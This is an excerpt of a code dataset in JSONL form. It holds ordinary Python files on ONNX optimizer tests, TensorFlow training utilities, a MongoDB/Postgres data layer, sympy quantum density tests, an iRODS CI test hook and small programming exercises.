(2, 3, 4, 5))],\n )\n\n model_proto = helper.make_model(graph, producer_name=\"onnx-tests\")\n self.run_and_compare([\"Z1\"], {\"X\": np.random.randn(2, 3, 4, 5).astype(np.float32)},\n model_proto)\n\n def test_leaky_relu(self):\n node1 = helper.make_node(\"Transpose\", [\"X\"], [\"Y\"], perm=[0, 2, 3, 1], name=\"trans_1\")\n node2 = helper.make_node(\"LeakyRelu\", [\"Y\"], [\"Z\"], alpha=0.02, name=\"relu\")\n node3 = helper.make_node(\"Transpose\", [\"Z\"], [\"Z1\"], perm=[0, 3, 1, 2], name=\"trans_2\")\n\n graph = helper.make_graph(\n [node1, node2, node3],\n 
\"LeakyRelu-test\",\n [helper.make_tensor_value_info(\"X\", TensorProto.FLOAT, (2, 3, 4, 5))],\n [helper.make_tensor_value_info(\"Z1\", TensorProto.FLOAT, (2, 3, 4, 5))],\n )\n\n model_proto = helper.make_model(graph, producer_name=\"onnx-tests\")\n self.run_and_compare([\"Z1\"], {\"X\": np.random.randn(2, 3, 4, 5).astype(np.float32)},\n model_proto)\n\n def test_max(self):\n const_1_val = [2.0]\n const_1 = helper.make_tensor(\"const_1\", TensorProto.FLOAT, (1,), const_1_val)\n const_1_node = helper.make_node(\"Constant\", [], [\"const_1\"], value=const_1, name=\"const_1\")\n\n const_2_val = np.random.randn(2, 4, 5, 3).astype(np.float32).reshape(120).tolist()\n const_2 = helper.make_tensor(\"const_2\", TensorProto.FLOAT, (2, 4, 5, 3), const_2_val)\n const_2_node = helper.make_node(\"Constant\", [], [\"const_2\"], value=const_2, name=\"const_2\")\n\n const_3_val = np.random.randn(2, 4, 5, 3).astype(np.float32).reshape(120).tolist()\n const_3 = helper.make_tensor(\"const_3\", TensorProto.FLOAT, (2, 4, 5, 3), const_3_val)\n const_3_node = helper.make_node(\"Constant\", [], [\"const_3\"], value=const_3, name=\"const_3\")\n\n node1 = helper.make_node(\"Transpose\", [\"X\"], [\"Y\"], perm=[0, 2, 3, 1], name=\"trans_1\")\n node2 = helper.make_node(\"Max\", [\"Y\", \"const_3\", \"const_2\", \"const_1\"], [\"Z\"], name=\"max\")\n node3 = helper.make_node(\"Transpose\", [\"Z\"], [\"Z1\"], perm=[0, 3, 1, 2], name=\"trans_2\")\n\n graph = helper.make_graph(\n [const_1_node, const_2_node, const_3_node, node1, node2, node3],\n \"Max-test\",\n [helper.make_tensor_value_info(\"X\", TensorProto.FLOAT, (2, 3, 4, 5))],\n [helper.make_tensor_value_info(\"Z1\", TensorProto.FLOAT, (2, 3, 4, 5))],\n )\n\n model_proto = helper.make_model(graph, producer_name=\"onnx-tests\")\n self.run_and_compare([\"Z1\"], {\"X\": np.random.randn(2, 3, 4, 5).astype(np.float32)},\n model_proto)\n\nif __name__ == \"__main__\":\n Tf2OnnxBackendTestBase.trigger(OptimizerTests)\n","sub_path":"tests/test_optimizers.py","file_name":"test_optimizers.py","file_ext":"py","file_size_in_byte":5279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"512888513","text":"def recognize(instruction):\n letters = ('A', 'B', 'C', 'D')\n numbers = ('1', '2', '3', '4')\n\n # Check for empty instruction and invalid single character instruction\n if len(instruction) < 2:\n return False\n\n # Check for first char error\n if instruction[0] not in letters:\n return False\n\n for i in range(1, len(instruction)):\n char = instruction[i]\n\n # Check if the character is valid\n if char not in letters and char not in numbers:\n return False\n\n # Check if the pattern is correct\n if char in letters and instruction[i-1] in numbers:\n return False\n\n return True\n","sub_path":"cap4/ex6.py","file_name":"ex6.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"412092691","text":"import sys\r\n#sys.stdin=open(\"input.txt\", \"r\")\r\n\r\nn = int(input())\r\nnList = list(map(int, input().split()))\r\n\r\nstrList = []\r\ncount = 0\r\n\r\ne = n-1\r\ns = 0\r\nbefore = 0\r\n\r\nwhile s <= e:\r\n\r\n if (nList[s] > before) and (nList[e] > before): #둘 다 before보다 큰 경우\r\n count += 1\r\n if nList[s] < nList[e]:\r\n strList.append(\"L\")\r\n before = nList[s]\r\n s += 1\r\n elif nList[e] < nList[s]:\r\n strList.append(\"R\")\r\n before = nList[e]\r\n e -= 1\r\n elif (nList[s] > before) or (nList[e] > before): #하나만 before보다 큰 
+{"seq_id":"412092691","text":"import sys\r\n#sys.stdin=open(\"input.txt\", \"r\")\r\n\r\nn = int(input())\r\nnList = list(map(int, input().split()))\r\n\r\nstrList = []\r\ncount = 0\r\n\r\ne = n-1\r\ns = 0\r\nbefore = 0\r\n\r\nwhile s <= e:\r\n\r\n    if (nList[s] > before) and (nList[e] > before): # case: both ends are greater than before\r\n        count += 1\r\n        if nList[s] < nList[e]:\r\n            strList.append(\"L\")\r\n            before = nList[s]\r\n            s += 1\r\n        elif nList[e] < nList[s]:\r\n            strList.append(\"R\")\r\n            before = nList[e]\r\n            e -= 1\r\n    elif (nList[s] > before) or (nList[e] > before): # case: only one end is greater than before\r\n        count += 1\r\n        if nList[s] > before:\r\n            strList.append(\"L\")\r\n            before = nList[s]\r\n            s += 1\r\n        elif nList[e] > before:\r\n            strList.append(\"R\")\r\n            before = nList[e]\r\n            e -= 1\r\n    else: break;\r\n    \r\nprint(count)\r\nprint(\"\".join(strList))\r\n\r\n","sub_path":"section4/9. 증가수열 만들기.py","file_name":"9. 증가수열 만들기.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"593732099","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 13 08:48:17 2019\n\n@author: rick\n\"\"\"\nimport os\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow.contrib import slim\n\n\n\n\ndef logit_to_multi_label(logits, threshold):\n    '''\n    Args: \n        logits, the tensor with shape [batch, num_classes],\n            e.g. [[0.2,0.6,0.9],[0.3,0.1,0.8],...].\n        threshold, if logits > threshold, then the bit will be set, \n            else it will be cleared.\n    Return:\n        labels, the tensor with shape [batch, num_classes],\n            [num_classes] is a label list, a non-zero bit means that label is present. \n    '''\n    label_list = tf.where(tf.greater(logits, threshold))\n    logits_shape = tf.shape(logits)\n    def _func_np(label_list_np, logits_shape_np):\n        batch = logits_shape_np[0]\n        max_num_classes = logits_shape_np[1]\n        labels = np.zeros((batch, max_num_classes), np.int32)\n        cnts = np.zeros((batch), np.int32)\n        for i in range(np.shape(label_list_np)[0]):\n            b = label_list_np[i, 0]\n            l = label_list_np[i, 1]\n            labels[b, cnts[b]] = l\n            cnts[b] = cnts[b] + 1\n        return labels\n    labels = tf.py_func(_func_np, [label_list, logits_shape], tf.int32)\n    return labels\n\ndef logit_to_label(logits):\n    '''\n    Args:\n        logits is the tensor with shape\n            [batch, shape(e.g. height*width or count), channels] or [batch, channels],\n            channel indices are 0,1,2,3,4,5,...,num_classes-1\n            corresponding to the label value,\n            in one point(e.g. x,y) channel[the label mask value(channel indices)]\n            has the max value;\n    Return:\n        labels is the mask with value 0,1,2,3,4,5,...,num_classes-1\n            and with shape [batch, shape(e.g. height*width or count)] or [batch];\n    '''\n    labels = tf.argmax(logits, axis=tf.size(tf.shape(logits))-1)\n    labels = tf.cast(labels, tf.int32)\n    return labels\n    \ndef label_to_logit(labels, num_classes, on_value=1.0, off_value=0.0):\n    '''\n    Args:\n        labels is the mask with value 0,1,2,3,4,5,...,num_classes-1\n            and with shape [batch, shape(e.g. height*width or count)] or [batch];\n        num_classes is the total number \n            with background class + original classes;\n    Return:\n        logits is the tensor with shape \n            [batch, shape(e.g. height*width or count), channels],\n            channel indices are 0,1,2,3,4,5,...,num_classes-1\n            corresponding to the label value,\n            in one point(e.g. 
x,y) channel[the label mask value(channel indices)]==1 else ==0;\n '''\n logits = slim.one_hot_encoding(\n tf.cast(labels, dtype=tf.int32), \n num_classes, on_value=on_value, off_value=off_value)\n return logits\n\ndef add_softmax_cross_entropy_loss(logits,\n labels,\n class_id_list,\n scope=None):\n \"\"\"Adds softmax cross entropy loss for logits of each scale.\n \n Args:\n logits: The logits have shape [batch, shape, num_classes].\n labels: Groundtruth labels with shape [batch, shape, 1] or [batch, shape].\n class_id_list: Class id list.\n scope: String, the scope for the loss.\n \n Raises:\n ValueError: Label or logits is None.\n \"\"\"\n if logits is None:\n raise ValueError('No logit for softmax cross entropy loss.')\n if labels is None:\n raise ValueError('No label for softmax cross entropy loss.')\n if class_id_list is None:\n raise ValueError('No class id list for softmax cross entropy loss.')\n if len(class_id_list) == 0:\n raise ValueError('Class id list is empty for softmax cross entropy loss.')\n\n weights = tf.equal(labels, class_id_list[0])\n for i in range(1, len(class_id_list)):\n weights = weights | tf.equal(labels, class_id_list[i])\n weights = tf.to_float(weights)\n \n num_classes = len(class_id_list)\n label_logits = label_to_logit(labels, num_classes)\n label_logits = tf.reshape(label_logits, shape=[-1, num_classes])\n logits = tf.reshape(logits, shape=[-1, num_classes])\n weights = tf.reshape(weights, shape=[-1])\n loss = tf.losses.softmax_cross_entropy(\n label_logits, logits,\n weights=weights,\n scope=scope)\n return loss\n\ndef add_sigmoid_cross_entropy_loss(logits,\n labels,\n class_id_list,\n scope=None):\n \"\"\"Adds sigmoid cross entropy loss for logits of each scale.\n \n Args:\n logits: The logits have shape [batch, shape, num_classes].\n labels: Groundtruth labels with shape [batch, shape, 1] or [batch, shape].\n class_id_list: Class id list.\n scope: String, the scope for the loss.\n \n Raises:\n ValueError: Label or logits is None.\n \"\"\"\n if logits is None:\n raise ValueError('No logit for softmax cross entropy loss.')\n if labels is None:\n raise ValueError('No label for softmax cross entropy loss.')\n if class_id_list is None:\n raise ValueError('No class id list for softmax cross entropy loss.')\n if len(class_id_list) == 0:\n raise ValueError('Class id list is empty for softmax cross entropy loss.')\n\n weights = tf.equal(labels, class_id_list[0])\n for i in range(1, len(class_id_list)):\n weights = weights | tf.equal(labels, class_id_list[i])\n weights = tf.to_float(weights)\n \n num_classes = len(class_id_list)\n label_logits = label_to_logit(labels, num_classes)\n label_logits = tf.reshape(label_logits, shape=[-1, num_classes])\n logits = tf.reshape(logits, shape=[-1, num_classes])\n weights = tf.reshape(weights, shape=[-1])\n loss = tf.losses.sigmoid_cross_entropy(\n label_logits, logits,\n weights=1.0,\n scope=scope)\n return loss\n\ndef get_model_learning_rate(\n learning_policy, base_learning_rate, learning_rate_decay_step,\n learning_rate_decay_factor, training_number_of_steps, learning_power,\n slow_start_step, slow_start_learning_rate, end_learning_rate=0.0):\n \"\"\"Gets model's learning rate.\n\n Computes the model's learning rate for different learning policy.\n Right now, only \"step\" and \"poly\" are supported.\n (1) The learning policy for \"step\" is computed as follows:\n current_learning_rate = base_learning_rate *\n learning_rate_decay_factor ^ (global_step / learning_rate_decay_step)\n See tf.train.exponential_decay for 
details.\n (2) The learning policy for \"poly\" is computed as follows:\n current_learning_rate = base_learning_rate *\n (1 - global_step / training_number_of_steps) ^ learning_power\n\n Args:\n learning_policy: Learning rate policy for training.\n base_learning_rate: The base learning rate for model training.\n learning_rate_decay_step: Decay the base learning rate at a fixed step.\n learning_rate_decay_factor: The rate to decay the base learning rate.\n training_number_of_steps: Number of steps for training.\n learning_power: Power used for 'poly' learning policy.\n slow_start_step: Training model with small learning rate for the first\n few steps.\n slow_start_learning_rate: The learning rate employed during slow start.\n\n Returns:\n Learning rate for the specified learning policy.\n\n Raises:\n ValueError: If learning policy is not recognized.\n \"\"\"\n global_step = tf.train.get_or_create_global_step()\n if learning_policy == 'step':\n learning_rate = tf.train.exponential_decay(\n learning_rate=base_learning_rate,\n global_step=global_step,\n decay_steps=learning_rate_decay_step,\n decay_rate=learning_rate_decay_factor,\n staircase=True,\n name='step_decay_learning_rate')\n learning_rate = tf.where(learning_rate < end_learning_rate, end_learning_rate,\n learning_rate)\n elif learning_policy == 'poly':\n learning_rate = tf.train.polynomial_decay(\n learning_rate=base_learning_rate,\n global_step=global_step,\n decay_steps=training_number_of_steps,\n end_learning_rate=end_learning_rate,\n power=learning_power,\n cycle=False,\n name='polynomial_decay_learning_rate')\n elif learning_policy == 'fixed':\n learning_rate = tf.constant(base_learning_rate, name='fixed_learning_rate')\n else:\n raise ValueError('Unknown learning policy.')\n\n # Employ small learning rate at the first few steps for warm start.\n warm_up_learning_rate = tf.add(slow_start_learning_rate,\n (base_learning_rate-slow_start_learning_rate)/slow_start_step*tf.cast(global_step,tf.float32),\n name='warm_up_learning_rate')\n return tf.where(global_step < slow_start_step, warm_up_learning_rate,\n learning_rate)\n\ndef get_model_init_fn(train_logdir,\n tf_initial_checkpoint,\n initialize_last_layer=True,\n last_layers=None,\n ignore_missing_vars=False):\n \"\"\"Gets the function initializing model variables from a checkpoint.\n\n Args:\n train_logdir: Log directory for training.\n tf_initial_checkpoint: TensorFlow checkpoint for initialization.\n initialize_last_layer: Initialize last layer or not.\n last_layers: Last layers of the model.\n ignore_missing_vars: Ignore missing variables in the checkpoint.\n\n Returns:\n Initialization function.\n \"\"\"\n if tf_initial_checkpoint is None:\n tf.logging.info('Not initializing the model from a checkpoint.')\n return None\n\n if tf.train.latest_checkpoint(train_logdir):\n tf.logging.info('Ignoring initialization; other checkpoint exists')\n return None\n\n tf.logging.info('Initializing model from path: %s', tf_initial_checkpoint)\n\n # Variables that will not be restored.\n exclude_list = ['global_step']\n if (not initialize_last_layer) and (last_layers is not None):\n exclude_list.extend(last_layers)\n\n variables_to_restore = slim.get_variables_to_restore(exclude=exclude_list)\n\n if variables_to_restore:\n return slim.assign_from_checkpoint_fn(\n tf_initial_checkpoint,\n variables_to_restore,\n ignore_missing_vars=ignore_missing_vars)\n return None\n\ndef save_model(sess, save_dir, ckpt_name='model.ckpt', save_step=None):\n path = os.path.join(save_dir, ckpt_name)\n saver = 
tf.train.Saver()\n save_path = saver.save(sess, path, global_step=save_step)\n return save_path\n\ndef restore_model(sess, restore_dir, ckpt_name='model.ckpt'):\n path = os.path.join(restore_dir, ckpt_name+'.meta')\n saver = tf.train.import_meta_graph(path)\n saver.restore(sess, tf.train.latest_checkpoint(restore_dir))\n \ndef copytensor(tensor):\n return tf.add(tensor, tf.zeros_like(tensor))\n\ndef summariyFeaturemapByName(tenor_name, summary_name, max_outputs=None):\n '''Tensor shape must be [batch_size, height, width, channels],\n only summary first feature map in a batch.'''\n featuremap = tf.get_default_graph().get_tensor_by_name(tenor_name)\n channels = featuremap.get_shape().as_list()[3]\n features = []\n for i in range(channels):\n feature = tf.expand_dims(featuremap[0, :, :, i], axis=2)\n features.append(feature)\n featuremap_summary = tf.stack(features, axis=0)\n tf.summary.image(\n summary_name, featuremap_summary, \n max_outputs=channels if max_outputs is None else max_outputs)\n\ndef get_label_weights(labels, class_id_list):\n '''Labels in class_id_list respect to weight 1.0, \n else will respect to weight 0.0.\n return weights have the same shape of labels.\n '''\n num_classes = len(class_id_list)\n weights_mask = tf.equal(labels, class_id_list[0])\n for i in range(1, num_classes):\n weights_mask = weights_mask | tf.equal(labels, class_id_list[i])\n weights = tf.to_float(weights_mask)\n return weights\n\ndef filter_labels(labels, class_id_list):\n '''Labels in class_id_list will be reserved, else will be set to 0,\n with data type int32. So label 0(class id) should be background.\n '''\n labels = tf.cast(labels, dtype=tf.int32)\n mask = tf.equal(labels, class_id_list[0])\n for i in range(1, len(class_id_list)):\n mask = mask | tf.equal(labels, class_id_list[i])\n labels_filtered = tf.where(mask, labels, tf.zeros_like(labels, dtype=tf.int32))\n return labels_filtered\n\ndef build_tensor_map(key_list_tensor, value_list_tensor, default_value):\n return tf.contrib.lookup.HashTable(\n tf.contrib.lookup.KeyValueTensorInitializer(\n keys=key_list_tensor,\n values=value_list_tensor),\n default_value=default_value)\n\n\ndef mapping_tensor(input_key_tensor, tensor_map):\n '''\n e.g. 
input_key_tensor=tensor([b'person', b'aeroplane', b'']),\n then output_value_tensor=tensor([15, 1, -1]).\n '''\n # tensor_map.init.run()\n output_value_tensor = tensor_map.lookup(input_key_tensor)\n return output_value_tensor","sub_path":"projects/deepin/src/utils/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":13033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"513947686","text":"from Midas.configs import (\n mongo_connection_info,\n default_db,\n raw_data_collection,\n sessions_collection,\n models_collection,\n postgres_connection_info as pg,\n)\nfrom hashlib import md5\nimport time\nimport pickle\nfrom pymongo import MongoClient, ReturnDocument\nimport pandas as pd\nfrom bson import ObjectId\nfrom sqlalchemy import create_engine\n\n\ndef mongo_to_df(db, collection, query={}, no_id=True):\n \"\"\" Read from Mongo and Store into DataFrame \"\"\"\n mongo_conn = MongoClient(**mongo_connection_info)\n # Make a query to the specific DB and Collection\n database = mongo_conn[db]\n cursor = database[collection].find(query)[\"data\"]\n\n # Expand the cursor and construct the DataFrame\n df = pd.DataFrame(list(cursor))\n\n # Delete the _id\n if no_id:\n del df[\"_id\"]\n\n return df\n\n\ndef get_headers(collection, db=default_db):\n return mongo_to_df(db, collection).tolist()\n\n\ndef load_df_to_postgres(df, table, **kwargs):\n engine = create_engine(\n f\"postgresql://{pg['user']}@{pg['host']}:{pg['port']}/{pg['database']}\"\n )\n df.to_sql(table, engine, **kwargs)\n\n\ndef postgres_to_df(query, **kwargs):\n engine = create_engine(\n f\"postgresql://{pg['user']}@{pg['host']}:{pg['port']}/{pg['database']}\"\n )\n return pd.read_sql(query, engine, **kwargs)\n\n\ndef upload_raw_data(session_id, raw_data):\n mi_raw_data = MongoInterface(default_db, raw_data_collection)\n\n raw_data_id = mi_raw_data.insert_records({\"data\": raw_data})\n\n update_session_data(session_id, dict(raw_data_ids=raw_data_id))\n return str(raw_data_id)\n\n\ndef update_session_data(session_id, push_dict):\n mi = MongoInterface(default_db, sessions_collection)\n return mi.update_records({\"_id\": ObjectId(session_id)}, {\"$push\": push_dict})\n\n\ndef create_new_session(session_obj):\n # session_obj here is a dict\n mi = MongoInterface(default_db, sessions_collection)\n return mi.insert_records(session_obj)\n\n\ndef get_session_data(session_id):\n mi = MongoInterface(default_db, sessions_collection)\n return mi.retrieve_records({\"_id\": ObjectId(session_id)})\n\n\ndef get_models_from_session(session_id):\n model_ids = get_session_data(session_id)[\"model_ids\"]\n mi = MongoInterface(default_db, models_collection)\n\n model_filter = []\n for model in model_ids:\n model_filter.append({\"_id\": ObjectId(model)})\n\n return mi.retrieve_records(model_filter)\n\n\ndef get_model(model_id):\n mi = MongoInterface(default_db, models_collection)\n return mi.retrieve_records({\"_id\": ObjectId(model_id)})\n\n\ndef save_model(model):\n mi = MongoInterface(default_db, models_collection)\n\n model_id = mi.insert_records(\n {\n \"pickled_model\": model,\n }\n )\n return model_id\n\n\ndef update_model(model_id, update_values, operation=\"set\"):\n mi = MongoInterface(default_db, models_collection)\n mi.update_records({\"_id\": ObjectId(model_id)}, {f\"${operation}\": update_values})\n\n\ndef delete_model(model_id):\n mi = MongoInterface(default_db, models_collection)\n mi.delete_records({\"_id\": ObjectId(model_id)})\n\n\ndef 
delete_session(session_id):\n\n print(f\"session_id: {session_id}\")\n mis = MongoInterface(default_db, sessions_collection)\n # we should be getting 1 session because objectids are unique\n session = mis.retrieve_records({\"_id\": ObjectId(session_id)})[0]\n count = mis.delete_records({\"_id\": ObjectId(session_id)})\n # delete associated model\n print(count)\n delete_model(session[\"model_id\"])\n \n\n\ndef get_raw_data(session_id):\n raw_data_ids = get_session_data(session_id)[\"raw_data_ids\"]\n mi = MongoInterface(default_db, raw_data_collection)\n\n raw_data_filter = []\n\n for _id in raw_data_ids:\n raw_data_filter.append({\"_id\": ObjectId(_id)})\n\n return mi.retrieve_records(raw_data_filter)\n\n\ndef raw_data_to_df(raw_data_id):\n mi = MongoInterface(default_db, raw_data_collection)\n data = mi.retrieve_records({\"_id\": ObjectId(raw_data_id)})[\"data\"]\n df = pd.read_json(data, orient=\"records\")\n\n return df\n\n\ndef get_all_sessions():\n mis = MongoInterface(default_db, sessions_collection)\n all_sessions = mis.retrieve_records({})\n print(all_sessions)\n model_data = []\n for session in all_sessions:\n # print(\"session: %s\" % str(session[\"_id\"]))\n model_data.append(\n {\n \"session_id\": session[\"_id\"],\n \"ml_algorithm\": session[\"ml_algorithm\"],\n \"pretty_name\": session[\"pretty_name\"],\n }\n )\n\n print(model_data)\n return model_data\n\n\nclass MongoInterface:\n def __init__(self, db, collection):\n mongo_conn = MongoClient(**mongo_connection_info)\n database = mongo_conn[db]\n self.interface = database[collection]\n\n def insert_records(self, records):\n \"\"\"\n simple method to insert one or many records\n \"\"\"\n # short circuit for situation where we provided a single dict\n\n if type(records) == dict:\n result = self.interface.insert_one(records)\n return result.inserted_id\n elif type(records) == list and len(records) == 1:\n result = self.interface.insert_one(records[0])\n return result.inserted_id\n else:\n result = self.interface.insert_many(records)\n return result.inserted_ids\n\n def retrieve_records(self, _filter):\n \"\"\"\n simple method to retrieve mongo records\n returns updated records (dicts)\n \"\"\"\n return self.interface.find(_filter)\n\n def update_records(self, _filter, update_values):\n \"\"\"\n simple method to update mongo records\n \"\"\"\n if type(_filter) == dict:\n return self.interface.find_one_and_update(\n _filter,\n update_values,\n upsert=True,\n return_document=ReturnDocument.AFTER,\n )\n elif type(_filter) == list and len(_filter) == 1:\n return self.interface.find_one_and_update(\n _filter[0],\n update_values[0],\n upsert=True,\n return_document=ReturnDocument.AFTER,\n )\n else:\n self.interface.update_many(_filter, update_values, upsert=True)\n return self.interface.find(_filter)\n\n def delete_records(self, _filter):\n if type(_filter) == dict:\n result = self.interface.delete_one(_filter)\n elif type(_filter) == list and len(_filter) == 1:\n result = self.interface.delete_one(_filter[0])\n else:\n result = self.interface.delete_many(_filter)\n return result.deleted_count\n","sub_path":"Midas/databases.py","file_name":"databases.py","file_ext":"py","file_size_in_byte":6688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"26626442","text":"from sympy import pprint, latex, symbols\nfrom sympy.physics.quantum.density import Density\nfrom sympy.physics.quantum.state import Ket, Bra\nfrom sympy.physics.quantum.qubit import Qubit\nfrom sympy.physics.quantum.qapply 
import qapply\nfrom sympy.physics.quantum.gate import HadamardGate\nfrom sympy.physics.quantum.represent import represent\nfrom sympy.physics.quantum.dagger import Dagger\nfrom sympy.physics.quantum.cartesian import XKet, PxKet, PxOp, XOp\nfrom sympy.functions import sqrt\nfrom sympy.utilities.pytest import raises\n\ndef test_eval_args():\n # check instance created\n assert isinstance(Density([Ket(0), 0.5], [Ket(1), 0.5]), Density)\n\n # check for value error, when prob is not provided\n raises(ValueError, 'Density([Ket(0)], [Ket(1)])')\n\ndef test_doit():\n x,y = symbols('x y')\n d = Density([XKet(),0.5], [PxKet(),0.5])\n assert (0.5*(PxKet()*Dagger(PxKet())) +\n 0.5*(XKet()*Dagger(XKet()))) == d.doit()\n\n # check for kets with expr in them\n d_with_sym = Density([XKet(x*y),0.5], [PxKet(x*y),0.5])\n assert (0.5*(PxKet(x*y)*Dagger(PxKet(x*y))) +\n 0.5*(XKet(x*y)*Dagger(XKet(x*y)))) == d_with_sym.doit()\n\ndef test_apply_op():\n d = Density([Ket(0), 0.5], [Ket(1), 0.5])\n assert d.apply_op(XOp()) == Density([XOp()*Ket(0), 0.5],\n [XOp()*Ket(1), 0.5])\n\ndef test_represent():\n x,y = symbols('x y')\n d = Density([XKet(),0.5], [PxKet(),0.5])\n assert (represent(0.5*(PxKet()*Dagger(PxKet()))) +\n represent(0.5*(XKet()*Dagger(XKet())))) == represent(d)\n\n # check for kets with expr in them\n d_with_sym = Density([XKet(x*y),0.5], [PxKet(x*y),0.5])\n assert (represent(0.5*(PxKet(x*y)*Dagger(PxKet(x*y)))) +\n represent(0.5*(XKet(x*y)*Dagger(XKet(x*y))))) == \\\n represent(d_with_sym)\n\n # check when given explicit basis\n assert (represent(0.5*(XKet()*Dagger(XKet())), basis=PxOp()) +\n represent(0.5*(PxKet()*Dagger(PxKet())), basis=PxOp())) == \\\n represent(d, basis=PxOp())\n\ndef test_states():\n d = Density([Ket(0), 0.5], [Ket(1), 0.5])\n states = d.states()\n assert states[0] == Ket(0) and states[1] == Ket(1)\n\ndef test_probs():\n d = Density([Ket(0), .75], [Ket(1), 0.25])\n probs = d.probs()\n assert probs[0] == 0.75 and probs[1] == 0.25\n\n #probs can be symbols\n x,y = symbols('x y')\n d = Density([Ket(0), x], [Ket(1), y])\n probs = d.probs()\n assert probs[0] == x and probs[1] == y\n\ndef test_get_state():\n x,y = symbols('x y')\n d = Density([Ket(0), x], [Ket(1), y])\n states = (d.get_state(0), d.get_state(1))\n assert states[0] == Ket(0) and states[1] == Ket(1)\n\ndef test_get_prob():\n x,y = symbols('x y')\n d = Density([Ket(0), x], [Ket(1), y])\n probs = (d.get_prob(0), d.get_prob(1))\n assert probs[0] == x and probs[1] == y\n","sub_path":"sympy/physics/quantum/tests/test_density.py","file_name":"test_density.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"376202757","text":"from __future__ import print_function\n\nimport argparse\nimport os\nimport shutil\nimport glob\nimport time\nimport irods_python_ci_utilities\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--output_root_directory', type=str, required=True)\n parser.add_argument('--built_packages_root_directory', type=str, required=True)\n parser.add_argument('--munge_path', type=str, default=None, help='munge externals path')\n parser.add_argument('--test_unified_storage_tiering', type=str, default=None, help='should be either True or False')\n\n args = parser.parse_args()\n\n output_root_directory = args.output_root_directory\n built_packages_root_directory = args.built_packages_root_directory\n package_suffix = irods_python_ci_utilities.get_package_suffix()\n os_specific_directory = 
irods_python_ci_utilities.append_os_specific_directory(built_packages_root_directory)\n    irods_python_ci_utilities.subprocess_get_output(['sudo', '-EH', 'pip', 'install', 'unittest-xml-reporting==1.14.0'])\n    irods_python_ci_utilities.install_os_packages_from_files(glob.glob(os.path.join(os_specific_directory, 'irods-rule-engine-plugin-unified-storage-tiering*')))\n    \n    test_name = 'test_plugin_unified_storage_tiering'\n\n    time.sleep(10)\n    irods_python_ci_utilities.subprocess_get_output(['sudo', 'chmod', 'g+rwx', '/dev/fuse'], check_rc=True)\n\n    time.sleep(10)\n\n    try:\n        test_output_file = '/var/lib/irods/log/test_output.log'\n\n        if args.munge_path is not None and args.munge_path != '':\n            irods_python_ci_utilities.subprocess_get_output(['sudo', 'su', '-', 'irods', '-c', 'cd scripts; {0}; python2 run_tests.py --xml_output --run_s {1} 2>&1 | tee {2}; exit $PIPESTATUS'.format(args.munge_path, test_name, test_output_file)], check_rc=True)\n        else:\n            irods_python_ci_utilities.subprocess_get_output(['sudo', 'su', '-', 'irods', '-c', 'python2 scripts/run_tests.py --xml_output --run_s {0} 2>&1 | tee {1}; exit $PIPESTATUS'.format(test_name, test_output_file)], check_rc=True)\n    finally:\n        if output_root_directory:\n            irods_python_ci_utilities.gather_files_satisfying_predicate('/var/lib/irods/log', output_root_directory, lambda x: True)\n            shutil.copy('/var/lib/irods/log/test_output.log', output_root_directory)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"irods_consortium_continuous_integration_test_hook.py","file_name":"irods_consortium_continuous_integration_test_hook.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"293971625","text":"import os\nfrom app import app\nfrom flask import redirect\nfrom app.routes.routes import stocks_blueprint\n\napp.register_blueprint(stocks_blueprint, url_prefix='/stocks')\n\n@app.route('/')\ndef base():\n    return redirect(\"/stocks/table\", code=302)\n\nproduction = os.environ.get(\"PRODUCTION\", False)\n\nif __name__ == '__main__':\n    if production:\n        app.run()\n    else:\n        app.run(host='127.0.0.1', port=8000, debug=True)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"383235104","text":"import time\nstart = time.time()\n\ndef pascal(rows):\n    l = [[1]]\n    for r in range(1,rows + 1):\n        half = len(l)\n        if half % 2 != 0:\n            half -= 1\n        half = int(half/2)\n        #print (half)\n        zipped = zip([0]+l[-1],l[-1]+[0])\n        mapped = map(sum,zipped)\n        l.append(list(mapped))\n        #print (':',r)\n        print (l[-1][half])\n\n    #print (l)\npascal(40)\n\n\ntotalTime = (time.time() - start)\nprint ('Total time:', totalTime ,'second')\n","sub_path":"015LatticePaths.py","file_name":"015LatticePaths.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"193195691","text":"#!/usr/bin/python\n#\n# Copyright 2018-2021 Polyaxon, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#      http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 
